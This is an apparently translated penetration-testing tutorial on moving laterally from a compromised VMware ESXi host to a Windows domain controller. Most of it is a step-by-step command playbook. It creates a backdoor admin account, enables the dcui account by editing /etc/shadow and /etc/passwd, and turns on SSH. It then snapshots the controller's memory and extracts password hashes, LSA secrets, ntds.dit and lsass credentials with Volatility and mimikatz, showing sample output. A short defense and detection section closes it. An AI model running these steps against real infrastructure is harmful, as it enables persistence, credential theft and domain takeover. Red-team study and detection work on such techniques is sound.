0x00 Preface
---
Assume the following test environment: We have obtained control permissions of the internal VMware ESXI and discovered that a Windows domain controller server is installed on VMware ESXI.
This article only introduces the method of lateral movement from VMware ESXI to this Windows domain controller server from a technical research perspective, combining exploitation ideas and providing defense detection methods.
0x02 Introduction
---
This article will cover the following topics:
- Exploitation Ideas
- Common Commands
- Implementation Methods
0x03 Exploitation Ideas
---
Manage virtual machines through VMware ESXI, create snapshot files, and extract valuable information from the snapshot files.
0x04 Common Commands
---
1. Check Virtual Machine Version
vmware -vl |
2. User Information Related
(1) View All Users
esxcli system account list |
(2) View Administrator Users
esxcli system permission list |
(3) Add User
esxcli system account add -i test1 -p Password@1 -c Password@1 |
(4) Add Regular User as Administrator User
esxcli system permission set -i test1 -r Admin |
(5) Enable Built-in Administrator Account
By default, dcui is an administrator user but does not allow remote login. You can set the password for the dcui user and enable remote login by modifying the configuration file.
Set the dcui user password to Ballot5Twist7upset, input in sequence:
passwd dcui |
One-click set dcui user password: sed -i 's/dcui:\*:13358:0:99999:7:::/dcui:$6$NaeURj2m.ZplDfbq$LdmyMwxQ7FKh3DS5V\/zhRQvRvfWzQMSS3wftFwaUsD9IZuxdns.0X.SPx.59bT.kmJOJ\/y3zenTmEcoxDVQsS\/:19160:0:99999:7:::/g' /etc/shadow
Enable dcui user remote login:
Modify file /etc/passwd, change dcui:x:100:100:DCUI User:/:/sbin/nologin to dcui:x:100:100:DCUI User:/:/bin/sh
One-click enable dcui user remote login: sed -i 's/dcui:x:100:100:DCUI User:\/:\/sbin\/nologin/dcui:x:100:100:DCUI User:\/:\/bin\/sh/g' /etc/passwd
Enable ssh:
vim-cmd hostsvc/enable_ssh |
3. Virtual Machine Related
(1) View all virtual machines
vim-cmd vmsvc/getallvms |
(2) View the status of a specified virtual machine
vim-cmd vmsvc/power.getstate |
(3) Start a specified virtual machine, can be used for power-on and resume from suspended state
vim-cmd vmsvc/power.on |
(4) Suspend the specified virtual machine
vim-cmd vmsvc/power.suspend |
(5) Shut down the specified virtual machine
vim-cmd vmsvc/power.off |
(6) View the operation log of the specified virtual machine
vim-cmd vmsvc/get.tasklist |
4. Virtual Machine Snapshot Related
(1) View snapshot information of the specified virtual machine
vim-cmd vmsvc/get.snapshotinfo |
(2) Create a new snapshot
vim-cmd vmsvc/snapshot.create |
Example 1:
vim-cmd vmsvc/snapshot.create 1 test testsnapshot true true |
set to true indicates including memory; otherwise, the .vmem file cannot be generated
Example 2:
vim-cmd vmsvc/snapshot.create 1 test |
This command is equivalent to vim-cmd vmsvc/snapshot.create 1 test "" false false, does not include memory, and will not generate a .vmem file
(3) Delete Snapshot
vim-cmd vmsvc/snapshot.remove |
0x05 Implementation Method
---
1. Obtain the VM's vmid
vim-cmd vmsvc/getallvms |
In the test environment, the vmid for the virtual machine Windows Domain Controller server obtained from the output is 1
2. View the virtual machine's snapshot information
vim-cmd vmsvc/get.snapshotinfo 1 |
There are no virtual machine snapshots in the test environment
3. Create a snapshot for the virtual machine
vim-cmd vmsvc/snapshot.create 1 test testsnapshot true true |
In the test environment, obtain the snapshotIndex of the virtual machine Windows domain controller server from the output as 1
4. Use volatility to analyze the snapshot file
volatility is an open-source forensic analysis software
Python2 version address: https://github.com/volatilityfoundation/volatility
Python3 version address: https://github.com/volatilityfoundation/volatility3
volatility and volatility3 have different command syntax but essentially the same functionality. The latest version is volatility3, but volatility is chosen here for the following reasons:
- volatility has a standalone executable program, while volatility3 requires self-compilation
- volatility has a mimikatz plugin that can extract data from the lsass process, which volatility3 does not support
(1) Locate the image file
Search for files with the suffix .vmem, command as follows:
find -name *.vmem |
In the test environment, the image file location is obtained as ./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem
(2) Upload volatility_2.6_lin64_standalone
Download address for volatility_2.6_lin64_standalone:
http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
Analyzing snapshot files requires a .vmem file as a parameter, and .vmem files are typically large. To improve efficiency, volatility is uploaded to VMware ESXi here, and the snapshot file is analyzed on VMware ESXi.
(3) View image information
Obtain the system version through image information, the command is as follows:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" imageinfo |
In the test environment, the obtained Profile is Win2016x64_14393
(4) Obtain local user hash from the registry
The command is as follows:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" hashdump |
In the test environment, the output result:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58A478135A93AC3BF058A5EA0E8FDB71::: |
(5) Read LSA Secrets from the registry
The command is as follows:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" lsadump |
In the test environment, the output result:
NL$KM |
(6) Export all domain user hashes
Need to download ntds.dit, SYSTEM file, and SECURITY file
Locate the ntds.dit file with the following command:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" filescan |grep ntds.dit |
Output:
0x000000007eff8c20 16 0 R--rw- \Device\HarddiskVolume2\Windows\System32\ntds.dit |
Extract the ntds.dit file with the following command:
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" dumpfiles -Q 0x000000007eff8c20 --name file -D /tmp/ |
Then extract the SYSTEM and SECURITY files in sequence. To export all domain user hashes, you can use secretsdump with the command: secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
(7) Load the mimikatz plugin to read credentials saved in the lsass process
volatility_2.6_lin64_standalone does not support loading the mimikatz plugin. You can choose to download the entire snapshot file (DC1-Snapshot1.vmem) locally, set up a volatility environment, and load the mimikatz plugin
Method to install volatility on Kali:
- Installation
apt-get install pcregrep libpcre++-dev python2-dev python-pip -y |
- Test volatility
python2 vol.py -h |
- Add mimikatz plugin
Download URL: https://github.com/volatilityfoundation/community/blob/master/FrancescoPicasso/mimikatz.py
Save mimikatz.py to /volatility/plugins/
- Install dependencies for mimikatz plugin
pip2 install construct==2.5.5-reupload |
Do not use pip2 install construct directly here. A higher version of construct will cause an AttributeError: 'module' object has no attribute 'ULInt32' when loading mimikatz.py
- Test plugin
python2 vol.py --info | grep mimikatz |
Output:
Volatility Foundation Volatility Framework 2.6.1 |
Installation successful
The command to load the mimikatz plugin is as follows:
python2 vol.py -f "DC1-Snapshot1.vmem" --profile="Win2016x64_14393" mimikatz |
Output result:
Module User Domain Password |
Additional note:
To read credentials saved in the lsass process, the following methods can also be used:
- Convert the image file to a Crash Dump file
./volatility_2.6_lin64_standalone -f "./vmfs/volumes/62a735a8-ad916179-40dd-000c296a0829/DC1/DC1-Snapshot1.vmem" --profile="Win2016x64_14393" raw2dmp -O copy.dmp |
- Use Mimilib to export passwords from the dump file
For detailed methods, please refer to the previous article "Penetration Techniques - Using Mimilib to Export Passwords from Dump Files"
5. Delete Snapshot
vim-cmd vmsvc/snapshot.remove 1 5 |
0x06 Defense and Detection
1. Defense
Timely update patches for internal VMware ESXI
Disable SSH login for internal VMware ESXI
2. Detection
Check internal VMware ESXI login logs
Check if the snapshotIndex flag of virtual machine snapshot images is abnormal. For new virtual machines, the snapshotIndex for newly created snapshots increments starting from 1. Deleting snapshot images does not affect snapshotIndex. For example, after deleting a snapshot with snapshotIndex 1, the next created snapshot will have snapshotIndex 2.
0x07 Summary
---
This article introduces, from a technical research perspective, methods for lateral movement from VMware ESXI to the Windows domain controller server. It analyzes image files using Volatility, extracts key information, combines exploitation ideas, and provides defense and detection methods.